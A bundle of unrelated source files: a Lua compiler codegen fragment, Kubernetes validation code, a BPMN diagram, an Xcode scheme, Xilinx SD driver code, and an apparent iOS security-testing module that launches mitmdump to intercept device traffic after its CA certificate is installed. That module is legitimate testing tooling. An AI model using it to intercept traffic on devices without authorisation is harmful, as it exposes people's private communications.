            CodegenExp.process_concat_exp(fi, exp, a)
        elif isinstance(exp, NameExp):
            CodegenExp.process_name_exp(fi, exp, a)
        elif isinstance(exp, TableAccessExp):
            CodegenExp.process_table_access_exp(fi, exp, a)
        elif isinstance(exp, FuncCallExp):
            CodegenExp.process_func_call_exp(fi, exp, a, n)

    @staticmethod
    def process_vararg_exp(fi, a, n):
        # `...` is only legal inside a vararg function.
        if not fi.is_vararg:
            raise Exception('cannot use "..." outside a vararg function')
        fi.emit_vararg(a, n)

    @staticmethod
    def process_func_def_exp(fi, exp, a):
        # Imported here (not at module level) to break the circular
        # dependency with codegen_block.
        from codegen_block import CodegenBlock
        # Compile the nested function into its own FuncInfo...
        sub_fi = FuncInfo(fi, exp)
        fi.sub_funcs.append(sub_fi)
        if exp.par_list is not None:
            for param in exp.par_list:
                sub_fi.add_local_var(param)
        CodegenBlock.gen_block(sub_fi, exp.block)
        sub_fi.exit_scope()
        sub_fi.emit_return(0, 0)
        # ...then emit CLOSURE referencing it by prototype index.
        bx = len(fi.sub_funcs) - 1
        fi.emit_closure(a, bx)

    @staticmethod
    def process_table_constructor_exp(fi, exp, a):
        # Count array-part entries (entries without an explicit key);
        # key_exps[i] is None exactly when val_exps[i] is positional.
        narr = 0
        for key_exp in exp.key_exps:
            if key_exp is None:
                narr += 1
        nexps = len(exp.key_exps)
        # A trailing `...`/call may contribute all of its results to
        # the array part.
        mult_ret = nexps > 0 and ExpHelper.is_vararg_or_func_call(exp.val_exps[-1])
        fi.emit_new_table(a, narr, nexps-narr)
        arr_idx = 0
        for i in range(len(exp.key_exps)):
            key_exp = exp.key_exps[i]
            val_exp = exp.val_exps[i]
            if key_exp is None:
                # Array-part entry: evaluate into consecutive registers
                # and flush with SETLIST in batches of 50 (presumably
                # mirroring Lua's LFIELDS_PER_FLUSH -- confirm against
                # the VM instruction spec).
                arr_idx += 1
                tmp = fi.alloc_reg()
                if i == nexps - 1 and mult_ret:
                    CodegenExp.process_exp(fi, val_exp, tmp, -1)
                else:
                    CodegenExp.process_exp(fi, val_exp, tmp, 1)
                if arr_idx % 50 == 0 or arr_idx == narr:
                    n = arr_idx % 50
                    if n == 0:
                        n = 50
                    fi.free_regs(n)
                    c = (arr_idx - 1) // 50 + 1
                    if i == nexps - 1 and mult_ret:
                        # b == 0 means "store everything up to stack top".
                        fi.emit_set_list(a, 0, c)
                    else:
                        fi.emit_set_list(a, n, c)
                continue
            # Hash-part entry: key and value each get a register, then
            # a single SETTABLE stores the pair and frees both.
            b = fi.alloc_reg()
            CodegenExp.process_exp(fi, key_exp, b, 1)
            c = fi.alloc_reg()
            CodegenExp.process_exp(fi, val_exp, c, 1)
            fi.free_regs(2)
            fi.emit_set_table(a, b, c)

    @staticmethod
    def process_unop_exp(fi, exp, a):
        # Operand into a scratch register, one unary-op instruction,
        # scratch released.
        b = fi.alloc_reg()
        CodegenExp.process_exp(fi, exp.exp, b, 1)
        fi.emit_unary_op(exp.op, a, b)
        fi.free_reg()

    @staticmethod
    def process_binop_exp(fi, exp, a):
        if exp.op == TokenKind.OP_AND or exp.op == TokenKind.OP_OR:
            # Short-circuit operators: evaluate the left operand, then
            # TESTSET + JMP skip the right operand whenever the left
            # side already decides the result.
            b = fi.alloc_reg()
            CodegenExp.process_exp(fi, exp.exp1, b, 1)
            fi.free_reg()
            if exp.op == TokenKind.OP_AND:
                fi.emit_test_set(a, b, 0)
            else:
                fi.emit_test_set(a, b, 1)
            pc_of_jmp = fi.emit_jmp(0, 0)
            b = fi.alloc_reg()
            CodegenExp.process_exp(fi, exp.exp2, b, 1)
            fi.free_reg()
            fi.emit_move(a, b)
            # Back-patch the jump now that the landing pc is known.
            fi.fix_sbx(pc_of_jmp, fi.pc()-pc_of_jmp)
        else:
            # Strict operators: both operands into fresh registers, one
            # binary-op instruction, both registers released.
            b = fi.alloc_reg()
            CodegenExp.process_exp(fi, exp.exp1, b, 1)
            c = fi.alloc_reg()
            CodegenExp.process_exp(fi, exp.exp2, c, 1)
            fi.emit_binary_op(exp.op, a, b, c)
            fi.free_regs(2)

    @staticmethod
    def process_concat_exp(fi, exp, a):
        # CONCAT consumes a contiguous register range [b, c], so all
        # operands are evaluated into consecutive registers first.
        for sub_exp in exp.exps:
            a1 = fi.alloc_reg()
            CodegenExp.process_exp(fi, sub_exp, a1, 1)
        c = fi.used_regs - 1
        b = c - len(exp.exps) + 1
        fi.free_regs(c - b + 1)
        fi.emit_abc(OpCode.CONCAT, a, b, c)

    @staticmethod
    def process_name_exp(fi, exp, a):
        # Name resolution order: local slot, then upvalue, then a
        # global access rewritten as _ENV[name].
        r = fi.slot_of_local_var(exp.name)
        if r >= 0:
            fi.emit_move(a, r)
            return
        idx = fi.index_of_upval(exp.name)
        if idx >= 0:
            fi.emit_get_upval(a, idx)
            return
        prefix_exp = NameExp(exp.line, '_ENV')
        key_exp = StringExp(exp.line, exp.name)
        table_access_exp = TableAccessExp(exp.line, prefix_exp, key_exp)
        CodegenExp.process_table_access_exp(fi, table_access_exp, a)

    @staticmethod
    def process_table_access_exp(fi, exp, a):
        # table[key]: table and key each get a scratch register, one
        # GETTABLE, both released.
        b = fi.alloc_reg()
        CodegenExp.process_exp(fi, exp.prefix_exp, b, 1)
        c = fi.alloc_reg()
        CodegenExp.process_exp(fi, exp.key_exp, c, 1)
        fi.emit_get_table(a, b, c)
        fi.free_regs(2)

    @staticmethod
    def process_func_call_exp(fi, exp, a, n):
        # Regular call: `n` results requested by the caller.
        nargs = CodegenExp.process_prep_func_call(fi, exp, a)
        fi.emit_call(a, nargs, n)

    @staticmethod
    def process_tail_call_exp(fi, exp, a):
        # Tail call (`return f(...)`): reuses the caller's frame.
        nargs = CodegenExp.process_prep_func_call(fi, exp, a)
        fi.emit_tail_call(a, nargs)

    @staticmethod
    def process_prep_func_call(fi, exp, a):
        """Load callee and arguments into consecutive registers
        starting at `a`; return the arg count to encode (-1 = all
        results of a trailing vararg/call)."""
        nargs = len(exp.args)
        last_arg_is_vararg_or_fkunc_call = False
        CodegenExp.process_exp(fi, exp.prefix_exp, a, 1)
        if exp.name_exp is not None:
            # Method call (obj:name(...)): SELF loads the method from
            # the object and passes the object as the implicit first
            # argument; 0x100 marks the operand as a constant index.
            c = 0x100 + fi.index_of_constant(exp.name_exp.s)
            fi.emit_self(a, a, c)
        for i in range(len(exp.args)):
            arg = exp.args[i]
            tmp = fi.alloc_reg()
            if i == nargs - 1 and ExpHelper.is_vararg_or_func_call(arg):
                last_arg_is_vararg_or_fkunc_call = True
                CodegenExp.process_exp(fi, arg, tmp, -1)
            else:
                CodegenExp.process_exp(fi, arg, tmp, 1)
        fi.free_regs(nargs)
        if exp.name_exp is not None:
            # Account for the implicit self argument.
            nargs += 1
        if last_arg_is_vararg_or_fkunc_call:
            # Unknown number of arguments at compile time.
            nargs = -1
        return nargs
| {
"pile_set_name": "Github"
} |
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package validation
import (
"bytes"
"encoding/json"
"fmt"
ejson "github.com/exponent-io/jsonpath"
utilerrors "k8s.io/apimachinery/pkg/util/errors"
)
// Schema is an interface that knows how to validate an API object serialized to a byte array.
type Schema interface {
ValidateBytes(data []byte) error
}
// NullSchema always validates bytes.
type NullSchema struct{}
// ValidateBytes never fails for NullSchema.
func (NullSchema) ValidateBytes(data []byte) error { return nil }
// NoDoubleKeySchema is a schema that disallows double keys.
type NoDoubleKeySchema struct{}
// ValidateBytes rejects JSON documents that repeat a key inside
// metadata.labels or metadata.annotations; all failures are combined
// into a single aggregate error.
func (NoDoubleKeySchema) ValidateBytes(data []byte) error {
	var errs []error
	for _, path := range [][]string{
		{"metadata", "labels"},
		{"metadata", "annotations"},
	} {
		if err := validateNoDuplicateKeys(data, path...); err != nil {
			errs = append(errs, err)
		}
	}
	return utilerrors.NewAggregate(errs)
}
// validateNoDuplicateKeys seeks to the JSON object addressed by `path`
// and returns an error if any key appears in it more than once.
// A missing object is not an error.
func validateNoDuplicateKeys(data []byte, path ...string) error {
	r := ejson.NewDecoder(bytes.NewReader(data))
	// This is Go being unfriendly. The 'path ...string' comes in as a
	// []string, and SeekTo takes ...interface{}, so we can't just pass
	// the path straight in, we have to copy it. *sigh*
	ifacePath := []interface{}{}
	for ix := range path {
		ifacePath = append(ifacePath, path[ix])
	}
	found, err := r.SeekTo(ifacePath...)
	if err != nil {
		return err
	}
	if !found {
		// Nothing at that path: nothing to validate.
		return nil
	}
	// Walk the tokens of the object by hand; the decoder happily
	// yields duplicate keys, so record each key we've seen.
	seen := map[string]bool{}
	for {
		tok, err := r.Token()
		if err != nil {
			return err
		}
		switch t := tok.(type) {
		case json.Delim:
			// The closing brace ends the object we seeked to.
			if t.String() == "}" {
				return nil
			}
		case ejson.KeyString:
			if seen[string(t)] {
				return fmt.Errorf("duplicate key: %s", string(t))
			}
			seen[string(t)] = true
		}
	}
}
// ConjunctiveSchema encapsulates a schema list.
type ConjunctiveSchema []Schema
// ValidateBytes runs every schema in the conjunction against the data
// and aggregates all resulting errors into one.
func (c ConjunctiveSchema) ValidateBytes(data []byte) error {
	var errs []error
	for _, schema := range c {
		if err := schema.ValidateBytes(data); err != nil {
			errs = append(errs, err)
		}
	}
	return utilerrors.NewAggregate(errs)
}
| {
"pile_set_name": "Github"
} |
from core.framework.module import BaseModule
from core.utils.utils import Utils
class Module(BaseModule):
    # Framework metadata: module name/author/description, the
    # user-configurable options (name, default, required, help text),
    # and usage notes shown to the operator.
    meta = {
        'name': 'Intercepting Proxy',
        'author': '@LanciniMarco (@MWRLabs)',
        'description': 'Intercept the traffic generated by the device. Read the comments below before starting.',
        'options': (
            ('port', 9090, True, 'Proxy service port.'),
            ('verbose', False, True, 'Verbose output (print the HTTP headers of every request/response).'),
            ('anticache', True, True, 'Strip out request headers that might cause the server to return 304-not-modified.'),
            ('output', True, False, 'Full path of the output dump file.'),
            ('upstream_ip', False, False, 'Upstream proxy server IP (to forward all requests to).'),
            ('upstream_port', False, False, 'Upstream proxy server PORT (to forward all requests to).'),
            ('target_domain', "", False, 'Comma separated list of the domains to analyze (Example: domain.com,other.com). If empty, everything will be in scope.'),
        ),
        'comments': ['Connect this workstation and the device to the same Wi-Fi',
                     'Configure the device to use this host as proxy',
                     'Run `comms/certs/install_ca_mitm` to install the CA Certificate of MitmProxy on the device',
                     'Notice that, due to a current bug in Mitmproxy, if an upstream proxy is set, the logging functionality will not work (i.e., the output file will be empty)']
    }

    # ==================================================================================================================
    # UTILS
    # ==================================================================================================================
    def __init__(self, params):
        """Initialize the module and default the dump file to a path
        inside this module's output directory."""
        BaseModule.__init__(self, params)
        # Setting default output file
        self.options['output'] = self.local_op.build_output_path_for_file("proxy_regular.out", self)

    def module_pre(self):
        # A network proxy needs no target app, so bypass the
        # app-selection step of the standard pre-run checks.
        return BaseModule.module_pre(self, bypass_app=True)

    # ==================================================================================================================
    # RUN
    # ==================================================================================================================
    def module_run(self):
        """Assemble the mitmdump command line from the configured
        options and run it interactively until the user hits Ctrl-C."""
        # Parse variables
        port = self.options['port']
        verbose = self.options['verbose']
        anticache = self.options['anticache']
        output = self.options['output']
        upstream_ip = self.options['upstream_ip']
        upstream_port = self.options['upstream_port']
        target_domain = self.options['target_domain']
        # Check upstream: forwarding requires BOTH ip and port; setting
        # only one is a configuration error (unset options arrive as
        # None/False, hence the membership tests below).
        upstream_list = [upstream_ip, upstream_port]
        if None in upstream_list or False in upstream_list:
            upstream = False
            if any(upstream_list):
                self.printer.error('Please specify both the IP and PORT of the upstream proxy (or remove them both).')
                return
        else:
            upstream = True
        # Build command string
        cmd = "{proxyapp} -p {port}".format(proxyapp=self.TOOLS_LOCAL['MITMDUMP'],
                                           port=port)
        if verbose: cmd += ' -d'
        if anticache: cmd += ' --anticache'
        if output: cmd += ' --wfile {}'.format(output)
        if upstream: cmd += ' --upstream http://{ip}:{port}'.format(ip=upstream_ip, port=upstream_port)
        if target_domain:
            # Turn "a.com,b.com" into the regex '^(?!a\.com)(?!b\.com)'
            # -- presumably so mitmdump ignores every host NOT in the
            # target list; confirm against the mitmproxy --ignore docs.
            domain_list = map(Utils.regex_escape_str, target_domain.split(','))
            domain_list_string = ''.join(['(?!{})'.format(el) for el in domain_list])
            cmd += " --ignore '^{}'".format(domain_list_string)
        # Intercept
        self.printer.notify('Configure the device to use this host as proxy: {ip}:{port}'.format(ip=self.local_op.get_ip(), port=port))
        self.printer.info('Starting intercepting proxy. Press Ctrl-c to quit.')
        self.local_op.command_interactive(cmd)
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<bpmn:definitions xmlns:bpmn="http://www.omg.org/spec/BPMN/20100524/MODEL" xmlns:bpmndi="http://www.omg.org/spec/BPMN/20100524/DI" xmlns:di="http://www.omg.org/spec/DD/20100524/DI" xmlns:dc="http://www.omg.org/spec/DD/20100524/DC" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" id="Definitions_1" targetNamespace="http://bpmn.io/schema/bpmn" exporter="Camunda Modeler" exporterVersion="1.8.2">
<bpmn:process id="Process_1" isExecutable="false">
<bpmn:startEvent id="StartEvent_1">
<bpmn:outgoing>SequenceFlow_0j6tsnn</bpmn:outgoing>
</bpmn:startEvent>
<bpmn:sequenceFlow id="SequenceFlow_0j6tsnn" sourceRef="StartEvent_1" targetRef="Task_1b1r7ow" />
<bpmn:serviceTask id="Task_1b1r7ow" name="Order Articles">
<bpmn:incoming>SequenceFlow_0j6tsnn</bpmn:incoming>
<bpmn:outgoing>SequenceFlow_0baemzs</bpmn:outgoing>
</bpmn:serviceTask>
<bpmn:sequenceFlow id="SequenceFlow_0baemzs" sourceRef="Task_1b1r7ow" targetRef="Task_1t0a4uy" />
<bpmn:serviceTask id="Task_162x79i" name="Ship Articles">
<bpmn:incoming>SequenceFlow_0cu1bs2</bpmn:incoming>
<bpmn:outgoing>SequenceFlow_19klrd3</bpmn:outgoing>
</bpmn:serviceTask>
<bpmn:endEvent id="EndEvent_042s0oc">
<bpmn:incoming>SequenceFlow_19klrd3</bpmn:incoming>
</bpmn:endEvent>
<bpmn:sequenceFlow id="SequenceFlow_19klrd3" sourceRef="Task_162x79i" targetRef="EndEvent_042s0oc" />
<bpmn:sequenceFlow id="SequenceFlow_0cu1bs2" sourceRef="Task_1t0a4uy" targetRef="Task_162x79i" />
<bpmn:serviceTask id="Task_1t0a4uy" name="Debit totalPrice">
<bpmn:incoming>SequenceFlow_0baemzs</bpmn:incoming>
<bpmn:outgoing>SequenceFlow_0cu1bs2</bpmn:outgoing>
</bpmn:serviceTask>
</bpmn:process>
<bpmndi:BPMNDiagram id="BPMNDiagram_1">
<bpmndi:BPMNPlane id="BPMNPlane_1" bpmnElement="Process_1">
<bpmndi:BPMNShape id="_BPMNShape_StartEvent_2" bpmnElement="StartEvent_1">
<dc:Bounds x="111" y="230" width="36" height="36" />
<bpmndi:BPMNLabel>
<dc:Bounds x="84" y="266" width="90" height="20" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNShape>
<bpmndi:BPMNEdge id="SequenceFlow_0j6tsnn_di" bpmnElement="SequenceFlow_0j6tsnn">
<di:waypoint xsi:type="dc:Point" x="147" y="248" />
<di:waypoint xsi:type="dc:Point" x="203" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="175" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNShape id="ServiceTask_0c3g2sx_di" bpmnElement="Task_1b1r7ow">
<dc:Bounds x="203" y="208" width="100" height="80" />
</bpmndi:BPMNShape>
<bpmndi:BPMNEdge id="SequenceFlow_0baemzs_di" bpmnElement="SequenceFlow_0baemzs">
<di:waypoint xsi:type="dc:Point" x="303" y="248" />
<di:waypoint xsi:type="dc:Point" x="342" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="322.5" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNShape id="ServiceTask_0k2efs8_di" bpmnElement="Task_162x79i">
<dc:Bounds x="481" y="208" width="100" height="80" />
</bpmndi:BPMNShape>
<bpmndi:BPMNShape id="EndEvent_042s0oc_di" bpmnElement="EndEvent_042s0oc">
<dc:Bounds x="635" y="230" width="36" height="36" />
<bpmndi:BPMNLabel>
<dc:Bounds x="653" y="270" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNShape>
<bpmndi:BPMNEdge id="SequenceFlow_19klrd3_di" bpmnElement="SequenceFlow_19klrd3">
<di:waypoint xsi:type="dc:Point" x="581" y="248" />
<di:waypoint xsi:type="dc:Point" x="635" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="608" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNEdge id="SequenceFlow_0cu1bs2_di" bpmnElement="SequenceFlow_0cu1bs2">
<di:waypoint xsi:type="dc:Point" x="442" y="248" />
<di:waypoint xsi:type="dc:Point" x="481" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="461.5" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNShape id="ServiceTask_1mvu7vz_di" bpmnElement="Task_1t0a4uy">
<dc:Bounds x="342" y="208" width="100" height="80" />
</bpmndi:BPMNShape>
</bpmndi:BPMNPlane>
</bpmndi:BPMNDiagram>
</bpmn:definitions>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<Scheme
LastUpgradeVersion = "0900"
version = "1.3">
<BuildAction
parallelizeBuildables = "YES"
buildImplicitDependencies = "YES">
<BuildActionEntries>
<BuildActionEntry
buildForTesting = "YES"
buildForRunning = "YES"
buildForProfiling = "YES"
buildForArchiving = "YES"
buildForAnalyzing = "YES">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</BuildActionEntry>
</BuildActionEntries>
</BuildAction>
<TestAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
language = ""
shouldUseLaunchSchemeArgsEnv = "YES"
codeCoverageEnabled = "YES">
<Testables>
<TestableReference
skipped = "NO">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D9851BEFF229002C0205"
BuildableName = "Shallows-iOS Tests.xctest"
BlueprintName = "Shallows-iOS Tests"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</TestableReference>
</Testables>
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</MacroExpansion>
<AdditionalOptions>
</AdditionalOptions>
</TestAction>
<LaunchAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
language = ""
launchStyle = "0"
useCustomWorkingDirectory = "NO"
ignoresPersistentStateOnLaunch = "NO"
debugDocumentVersioning = "YES"
debugServiceExtension = "internal"
allowLocationSimulation = "YES">
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</MacroExpansion>
<AdditionalOptions>
</AdditionalOptions>
</LaunchAction>
<ProfileAction
buildConfiguration = "Release"
shouldUseLaunchSchemeArgsEnv = "YES"
savedToolIdentifier = ""
useCustomWorkingDirectory = "NO"
debugDocumentVersioning = "YES">
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</MacroExpansion>
</ProfileAction>
<AnalyzeAction
buildConfiguration = "Debug">
</AnalyzeAction>
<ArchiveAction
buildConfiguration = "Release"
revealArchiveInOrganizer = "YES">
</ArchiveAction>
</Scheme>
| {
"pile_set_name": "Github"
} |
/******************************************************************************
* Copyright (C) 2013 - 2020 Xilinx, Inc. All rights reserved.
* SPDX-License-Identifier: MIT
******************************************************************************/
/*****************************************************************************/
/**
*
* @file xsdps_host.c
* @addtogroup sdps_v3_9
* @{
*
* Contains the interface functions of the XSdPs driver.
* See xsdps.h for a detailed description of the device and driver.
*
* <pre>
* MODIFICATION HISTORY:
*
* Ver Who Date Changes
* ----- --- -------- -----------------------------------------------
* 3.9 mn 03/03/20 Restructured the code for more readability and modularity
* mn 03/16/20 Add code to get card ID for MMC/eMMC
*
* </pre>
*
******************************************************************************/
/***************************** Include Files *********************************/
#include "xsdps_core.h"
/************************** Constant Definitions *****************************/
/**************************** Type Definitions *******************************/
/***************** Macros (Inline Functions) Definitions *********************/
/************************** Function Prototypes ******************************/
#if EL1_NONSECURE && defined (__aarch64__)
void XSdps_Smc(XSdPs *InstancePtr, u32 RegOffset, u32 Mask, u32 Val)
{
	/* Non-secure EL1 cannot write SLCR registers directly: issue an
	 * MMIO-write SMC so the secure monitor performs the masked write
	 * at SlcrBaseAddr + RegOffset on our behalf. The upper 32 bits of
	 * the address argument carry the write mask. */
	(void)Xil_Smc(MMIO_WRITE_SMC_FID, (u64)(InstancePtr->SlcrBaseAddr +
			RegOffset) | ((u64)Mask << 32),
			(u64)Val, 0, 0, 0, 0, 0);
}
#endif
/*****************************************************************************/
/**
*
* @brief
* Switches the SD card voltage from 3v3 to 1v8
*
*
* @param InstancePtr is a pointer to the XSdPs instance.
*
******************************************************************************/
s32 XSdPs_Switch_Voltage(XSdPs *InstancePtr)
{
	s32 Status;

	/* Prepare the controller for the voltage switch sequence. */
	Status = XSdPs_SetupVoltageSwitch(InstancePtr);
	if (Status != XST_SUCCESS) {
		return XST_FAILURE;
	}

	/* Ask the card to move its signalling level to 1.8V. */
	Status = XSdPs_CardSetVoltage18(InstancePtr);
	if (Status != XST_SUCCESS) {
		return XST_FAILURE;
	}

	/* The switch only succeeded if the bus lines settle high. */
	if (XSdPs_CheckBusHigh(InstancePtr) != XST_SUCCESS) {
		return XST_FAILURE;
	}

	return XST_SUCCESS;
}
/*****************************************************************************/
/**
* @brief
* This function initiates the transfer to or from SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_SetupTransfer(XSdPs *InstancePtr)
{
	u32 PresentStateReg;
	s32 Status;

	/* The card-insertion check is skipped for SD 3.0 embedded slots
	 * and for controllers configured without a card-detect line. */
	if ((InstancePtr->HC_Version != XSDPS_HC_SPEC_V3) ||
		((InstancePtr->Host_Caps & XSDPS_CAPS_SLOT_TYPE_MASK)
		!= XSDPS_CAPS_EMB_SLOT)) {
		if(InstancePtr->Config.CardDetect != 0U) {
			/* Check status to ensure card is initialized */
			PresentStateReg = XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
					XSDPS_PRES_STATE_OFFSET);
			if ((PresentStateReg & XSDPS_PSR_CARD_INSRT_MASK) == 0x0U) {
				Status = XST_FAILURE;
				goto RETURN_PATH;
			}
		}
	}

	/* Set block size to 512 if not already set */
	if(XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
			XSDPS_BLK_SIZE_OFFSET) != XSDPS_BLK_SIZE_512_MASK ) {
		Status = XSdPs_SetBlkSize(InstancePtr,
			XSDPS_BLK_SIZE_512_MASK);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
* @brief
* This function resets the SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param Value is the type of reset
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_Reset(XSdPs *InstancePtr, u8 Value)
{
	/* Kick off the requested software reset (Value selects the
	 * reset scope, e.g. "all")... */
	XSdPs_WriteReg8(InstancePtr->Config.BaseAddress, XSDPS_SW_RST_OFFSET,
			Value);

	/* ...then wait for the controller to report completion. */
	if (XSdPs_CheckResetDone(InstancePtr, Value) != XST_SUCCESS) {
		return XST_FAILURE;
	}

	return XST_SUCCESS;
}
/*****************************************************************************/
/**
 * @brief
 * This function sets the Execute Tuning bit to start the tuning procedure.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return	None
 *
 ******************************************************************************/
void XSdPs_SetExecTuning(XSdPs *InstancePtr)
{
	u16 Ctrl2;

	/* Read-modify-write Host Control 2 to set the Execute Tuning bit */
	Ctrl2 = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
				XSDPS_HOST_CTRL2_OFFSET);
	Ctrl2 |= XSDPS_HC2_EXEC_TNG_MASK;
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			 XSDPS_HOST_CTRL2_OFFSET, Ctrl2);
}
/*****************************************************************************/
/**
 * @brief
 * This function does SD mode initialization: it reads the SCR register to
 * determine the supported bus width, switches to 4-bit mode when possible,
 * reads the supported speeds, and moves the card into UHS or high-speed
 * mode when both card and host permit.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
 * 		- XST_SUCCESS if initialization is successful
 * 		- XST_FAILURE if failure
 *
 ******************************************************************************/
s32 XSdPs_SdModeInit(XSdPs *InstancePtr)
{
	s32 Status;
	/* 32-byte aligned static buffer: used as a DMA target for ACMD51 */
#ifdef __ICCARM__
#pragma data_alignment = 32
	static u8 SCR[8] = { 0U };
#else
	static u8 SCR[8] __attribute__ ((aligned(32))) = { 0U };
#endif
	/* Scratch buffer for the CMD6 (SWITCH) status response */
	u8 ReadBuff[64] = { 0U };

	/* Read the SCR register (reports supported bus widths) */
	Status = XSdPs_Get_BusWidth(InstancePtr, SCR);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Switch to 4-bit mode when the card supports it */
	if ((SCR[1] & WIDTH_4_BIT_SUPPORT) != 0U) {
		InstancePtr->BusWidth = XSDPS_4_BIT_WIDTH;
		Status = XSdPs_Change_BusWidth(InstancePtr);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	}

	/* Get speed supported by device */
	Status = XSdPs_Get_BusSpeed(InstancePtr, ReadBuff);
	if (Status != XST_SUCCESS) {
		goto RETURN_PATH;
	}

	/*
	 * Switch signaling to 1.8V for UHS modes when: the card is spec v3+,
	 * it reports at least SDR50, and the voltage switch has not already
	 * been done.
	 * NOTE(review): the Config.BusWidth == XSDPS_WIDTH_8 check appears to
	 * be used as a board-level indicator that 1.8V signaling is wired up
	 * (8-bit is not an SD bus width) -- confirm against board config.
	 */
	if (((SCR[2] & SCR_SPEC_VER_3) != 0U) &&
	    (ReadBuff[13] >= UHS_SDR50_SUPPORT) &&
	    (InstancePtr->Config.BusWidth == XSDPS_WIDTH_8) &&
	    (InstancePtr->Switch1v8 == 0U)) {
		InstancePtr->Switch1v8 = 1U;
		Status = XSdPs_CardSetVoltage18(InstancePtr);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	}

	if (InstancePtr->Switch1v8 != 0U) {
		/* Identify the UHS mode supported by card */
		XSdPs_Identify_UhsMode(InstancePtr, ReadBuff);
		Status = XSdPs_Change_BusSpeed(InstancePtr);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	} else {
		/*
		 * card supports CMD6 when SD_SPEC field in SCR register
		 * indicates that the Physical Layer Specification Version
		 * is 1.10 or later. So for SD v1.0 cmd6 is not supported.
		 */
		if (SCR[0] != 0U) {
			/* Check for high speed support */
			if (((ReadBuff[13] & HIGH_SPEED_SUPPORT) != 0U) &&
			    (InstancePtr->BusWidth >= XSDPS_4_BIT_WIDTH)) {
				InstancePtr->Mode = XSDPS_HIGH_SPEED_MODE;
				/* Tap delays tuned for SD high-speed mode */
				InstancePtr->OTapDelay = SD_OTAPDLYSEL_SD_HSD;
				InstancePtr->ITapDelay = SD_ITAPDLYSEL_HSD;
				Status = XSdPs_Change_BusSpeed(InstancePtr);
				if (Status != XST_SUCCESS) {
					Status = XST_FAILURE;
					goto RETURN_PATH;
				}
			}
		}
	}

	/* Default to 512-byte blocks for all subsequent data transfers */
	Status = XSdPs_SetBlkSize(InstancePtr, XSDPS_BLK_SIZE_512_MASK);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function does MMC mode initialization: it switches to a 4-bit bus,
 * reads the extended CSD to obtain the sector count, and moves the card to
 * high-speed mode when supported.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
